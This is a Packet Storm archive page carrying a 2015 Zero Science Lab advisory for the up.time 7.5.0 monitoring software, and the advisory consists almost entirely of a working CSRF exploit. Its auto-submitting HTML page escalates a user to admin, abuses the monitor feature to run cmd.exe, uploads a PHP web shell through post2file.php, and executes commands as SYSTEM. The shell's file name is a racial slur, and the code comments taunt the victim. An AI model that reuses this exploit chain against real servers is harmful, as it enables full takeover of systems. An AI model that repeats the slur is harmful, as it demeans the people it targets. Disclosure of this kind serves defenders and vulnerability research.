exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

up.time 7.5.0 Upload / Execute File

up.time 7.5.0 Upload / Execute File
Posted Aug 22, 2015
Authored by LiquidWorm | Site zeroscience.mk

up.time suffers from arbitrary command execution. Attackers can exploit this issue using the monitor service feature and adding a command with respected arguments to given binary for execution. In combination with the CSRF, privilege escalation, arbitrary text file creation, and renaming that file to php you can execute system commands with SYSTEM privileges.

tags | exploit, arbitrary, php
SHA-256 | 949580b449c0517f641c161c6b8c3484aee9aca17ee184db120e309739d67e3f

up.time 7.5.0 Upload / Execute File

Change Mirror Download

up.time 7.5.0 Upload And Execute File Exploit


Vendor: Idera Inc.
Product web page: http://www.uptimesoftware.com
Affected version: 7.5.0 (build 16) and 7.4.0 (build 13)

Summary: The next-generation of IT monitoring software.

Desc: up.time suffers from arbitrary command execution.
Attackers can exploit this issue using the monitor service
feature and adding a command with respected arguments to given
binary for execution. In combination with the CSRF, Privilege
Escalation, Arbitrary text file creation and renaming that
file to php for example in arbitrary location and executing
system commands with SYSTEM privileges.

Tested on: Jetty, PHP/5.4.34, MySQL
Apache/2.2.29 (Win64) mod_ssl/2.2.29 OpenSSL/1.0.1j PHP/5.4.34


Vulnerability discovered by Ewerson 'Crash' Guimaraes
@zeroscience


Advisory ID: ZSL-2015-5254
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5254.php


29.07.2015

--


<html>
<head>
<title>Uptime Exploit</title>
</head>

<body onload="runme();">


<!-- Login -->
<form name="login" action="http://127.0.0.1:9999/index.php" method="POST" target="frame0">
<input type="hidden" name="username" value="sample" />
<input type="hidden" name="password" value="123456" />
</form>

<!-- Escalate privileges -->
<form name="privadm" action="http://127.0.0.1:9999/main.php?section=UserContainer&subsection=edit&id=2" method="POST" target="frame1">
<input type="hidden" name="operation" value="submit" />
<input type="hidden" name="disableEditOfUsernameRoleGroup" value="false" />
<input type="hidden" name="username" value="sample" />
<input type="hidden" name="password" value="123456" />
<input type="hidden" name="passwordConfirm" value="123456" />
<input type="hidden" name="firstname" value="Sample" />
<input type="hidden" name="lastname" value="User" />
<input type="hidden" name="location" value="" />
<input type="hidden" name="emailaddress" value="" />
<input type="hidden" name="emailtimeperiodid" value="1" />
<input type="hidden" name="phonenumber" value="" />
<input type="hidden" name="phonenumbertimeperiodid" value="1" />
<input type="hidden" name="windowshost" value="" />
<input type="hidden" name="windowsworkgroup" value="" />
<input type="hidden" name="windowspopuptimeperiodid" value="1" />
<input type="hidden" name="landingpage" value="MyPortal" />
<input type="hidden" name="isonvacation" value="0" />
<input type="hidden" name="receivealerts" value="0" />
<input type="hidden" name="activexgraphs" value="0" />
<input type="hidden" name="newuser" value="on" />
<input type="hidden" name="newuser" value="1" />
<input type="hidden" name="userroleid" value="1" />
<input type="hidden" name="usergroupid[]" value="1" />
</form>

<!-- Log-off to refresh permission -->
<form name="logoff" action="http://127.0.0.1:9999/main.php" method="POST" target="frame2">
<input type="hidden" name="logout" value="1" />
</form>

<!-- Login with escalated user -->
<form name="login2" action="http://127.0.0.1:9999/index.php?loggedout" method="POST" target="frame3">
<input type="hidden" name="username" value="sample" />
<input type="hidden" name="password" value="123456" />
</form>

<!-- Creating Monitor to rename php shell -->
<form name="createmonitor" action="http://127.0.0.1:9999/main.php?section=ERDCInstance&subsection=add" method="POST" target="frame4">
<input type="hidden" name="initialERDCId" value="20" />
<input type="hidden" name="target" value="1" />
<input type="hidden" name="targetType" value="systemList" />
<input type="hidden" name="systemList" value="1" />
<input type="hidden" name="serviceGroupList" value="-10" />
<input type="hidden" name="initialMode" value="standard" />
<input type="hidden" name="erdcName" value="Exploit" />
<input type="hidden" name="erdcInitialName" value="" />
<input type="hidden" name="erdcDescription" value="Exploit" />
<input type="hidden" name="hostButton" value="system" />
<input type="hidden" name="erdc_id" value="20" />
<input type="hidden" name="forceReload" value="0" />
<input type="hidden" name="operation" value="standard" />
<input type="hidden" name="erdc_instance_id" value="" />
<input type="hidden" name="label_[184]" value="Script Name" />
<input type="hidden" name="value_[184]" value="c:\windows\system32\cmd.exe" />
<input type="hidden" name="id_[184]" value="process" />
<input type="hidden" name="name_[process]" value="184" />
<input type="hidden" name="units_[184]" value="" />
<input type="hidden" name="guiBasic_[184]" value="1" />
<input type="hidden" name="inputType_[184]" value="GUIString" />
<input type="hidden" name="screenOrder_[184]" value="1" />
<input type="hidden" name="parmType_[184]" value="1" />
<input type="hidden" name="label_[185]" value="Arguments" />
<input type="hidden" name="value_[185]" value=" /C ren "C:\Program Files\uptime software\uptime\GUI\wizards\nigga.txt" "nigga.php" " />
<input type="hidden" name="id_[185]" value="args" />
<input type="hidden" name="name_[args]" value="185" />
<input type="hidden" name="units_[185]" value="" />
<input type="hidden" name="guiBasic_[185]" value="1" />
<input type="hidden" name="inputType_[185]" value="GUIString" />
<input type="hidden" name="screenOrder_[185]" value="2" />
<input type="hidden" name="parmType_[185]" value="1" />
<input type="hidden" name="label_[187]" value="Output" />
<input type="hidden" name="can_retain_[187]" value="false" />
<input type="hidden" name="comparisonWarn_[187]" value="-1" />
<input type="hidden" name="comparison_[187]" value="-1" />
<input type="hidden" name="id_[187]" value="value_critical_output" />
<input type="hidden" name="name_[output]" value="187" />
<input type="hidden" name="units_[187]" value="" />
<input type="hidden" name="guiBasic_[187]" value="1" />
<input type="hidden" name="inputType_[187]" value="GUIString" />
<input type="hidden" name="screenOrder_[187]" value="4" />
<input type="hidden" name="parmType_[187]" value="2" />
<input type="hidden" name="label_[189]" value="Response time" />
<input type="hidden" name="can_retain_[189]" value="false" />
<input type="hidden" name="comparisonWarn_[189]" value="-1" />
<input type="hidden" name="comparison_[189]" value="-1" />
<input type="hidden" name="id_[189]" value="value_critical_timer" />
<input type="hidden" name="name_[timer]" value="189" />
<input type="hidden" name="units_[189]" value="ms" />
<input type="hidden" name="guiBasic_[189]" value="0" />
<input type="hidden" name="inputType_[189]" value="GUIInteger" />
<input type="hidden" name="screenOrder_[189]" value="6" />
<input type="hidden" name="parmType_[189]" value="2" />
<input type="hidden" name="timing_[erdc_instance_monitored]" value="1" />
<input type="hidden" name="timing_[timeout]" value="60" />
<input type="hidden" name="timing_[check_interval]" value="10" />
<input type="hidden" name="timing_[recheck_interval]" value="1" />
<input type="hidden" name="timing_[max_rechecks]" value="3" />
<input type="hidden" name="alerting_[notification]" value="1" />
<input type="hidden" name="alerting_[alert_interval]" value="120" />
<input type="hidden" name="alerting_[alert_on_critical]" value="1" />
<input type="hidden" name="alerting_[alert_on_warning]" value="1" />
<input type="hidden" name="alerting_[alert_on_recovery]" value="1" />
<input type="hidden" name="alerting_[alert_on_unknown]" value="1" />
<input type="hidden" name="time_period_id" value="1" />
<input type="hidden" name="pageFinish" value="Finish" />
<input type="hidden" name="pageContinue" value="Continue..." />
<input type="hidden" name="isWizard" value="1" />
<input type="hidden" name="wizardPage" value="2" />
<input type="hidden" name="wizardNumPages" value="2" />
<input type="hidden" name="wizardTask" value="pageFinish" />
<input type="hidden" name="visitedPage[1]" value="1" />
<input type="hidden" name="visitedPage[2]" value="1" />
</form>


<!-- Uploading php shell txt format -->
<form name="uploadshell" action="http://127.0.0.1:9999/wizards/post2file.php" method="POST" target="frame5">
<input type="hidden" name="file_name" value="nigga.txt" />
<input type="hidden" name="script" value="<? passthru($_GET['cmd']); ?>" />
</form>


<!-- Run command to rename php shell -->
<form name="run" action="http://127.0.0.1:9999/main.php" method="POST" target="frame6">
<input type="hidden" name="section" value="RunERDCInstance" />
<input type="hidden" name="subsection" value="view" />
<input type="hidden" name="id" value="65535" />
<input type="hidden" name="name" value="Exploit" />
</form>


<!-- Executing basic command -->
<form name="exploit" action="http://127.0.0.1:9999/wizards/nigga.php" METHOD="GET" target="frame7">
<input type="hidden" name="cmd" value="whoami" />
</form>


<iframe name="frame0"></iframe>
<iframe name="frame1"></iframe>
<iframe name="frame2"></iframe>
<iframe name="frame3"></iframe>
<iframe name="frame4"></iframe>
<iframe name="frame5"></iframe>
<iframe name="frame6"></iframe>
<iframe name="frame7"></iframe>

<script>
function runme()
{
document.login.submit();
document.getElementsByTagName("iframe")[0].onload = function()
//document.write("Login....")
{
document.privadm.submit();
document.getElementsByTagName("iframe")[1].onload = function()
//document.write("Mutating to admin uahsuasuas");
{
document.logoff.submit();
document.getElementsByTagName("iframe")[2].onload = function()
//document.write("Refreshing perms...");
{
document.login2.submit();
document.getElementsByTagName("iframe")[3].onload = function()
//document.write("Login again...Keep Calm....");
{
document.createmonitor.submit();
document.getElementsByTagName("iframe")[4].onload = function()
//document.write("Creating F*cking monitor");
{
document.uploadshell.submit();
document.getElementsByTagName("iframe")[5].onload = function()
//document.write("Uploading webshell. Muaaaaa! Muaaaaa!!");
{
document.run.submit();
document.getElementsByTagName("iframe")[6].onload = function()
//document.write("Trick to shell... come on....");
{
document.exploit.submit();
document.getElementsByTagName("iframe")[7].onload = function()
alert('Pwned!!!!!!!!!!!!!!!!!!!!!!')
}
}
}
}
}
}
}
}
</script>

</body>
</html>
Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    0 Files
  • 4
    Oct 4th
    0 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close